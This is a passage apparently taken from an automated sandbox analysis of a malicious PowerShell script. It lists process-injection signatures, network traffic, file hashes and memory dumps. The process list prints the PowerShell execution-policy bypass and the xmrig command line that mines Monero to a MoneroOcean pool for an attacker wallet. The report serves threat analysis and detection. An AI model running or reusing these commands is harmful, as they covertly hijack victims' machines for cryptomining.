| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 960 wrote to memory of 3192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 960 wrote to memory of 3192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3236,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=4224 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4980,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=756 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
Files
memory/960-0-0x00007FFC83AA3000-0x00007FFC83AA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r3t3qzl5.0qf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/960-10-0x00000185F3AB0000-0x00000185F3AD2000-memory.dmp
memory/960-11-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-12-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-14-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/960-15-0x00000185F3C80000-0x00000185F3C92000-memory.dmp
memory/960-16-0x00000185F3C60000-0x00000185F3C6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3192-47-0x0000020F1EB10000-0x0000020F1EB30000-memory.dmp
memory/3192-48-0x0000020F20310000-0x0000020F20330000-memory.dmp
memory/3192-49-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/960-50-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/3192-52-0x0000020FB29C0000-0x0000020FB29E0000-memory.dmp
memory/3192-51-0x0000020FB2790000-0x0000020FB27B0000-memory.dmp
memory/960-54-0x00007FFC83AA3000-0x00007FFC83AA5000-memory.dmp
memory/3192-53-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-55-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/960-56-0x00007FFC83AA0000-0x00007FFC84561000-memory.dmp
memory/3192-59-0x0000020FB29C0000-0x0000020FB29E0000-memory.dmp
memory/3192-58-0x0000020FB2790000-0x0000020FB27B0000-memory.dmp
memory/3192-57-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-60-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-61-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-62-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-63-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-64-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-65-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-66-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-67-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-68-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-69-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-70-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-71-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-72-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-73-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-74-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-75-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-76-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-77-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-78-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-79-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-80-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-81-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-82-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-83-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-84-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-85-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-86-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-87-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-88-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-89-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-90-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-91-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-92-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-93-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-94-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-95-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-96-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-97-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-98-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-99-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-100-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-101-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-102-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-103-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-104-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-105-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-106-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-107-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-108-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-109-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-110-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-111-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-112-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-113-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-114-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-115-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-116-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-117-0x00007FF701990000-0x00007FF7025C3000-memory.dmp
memory/3192-118-0x00007FF701990000-0x00007FF7025C3000-memory.dmp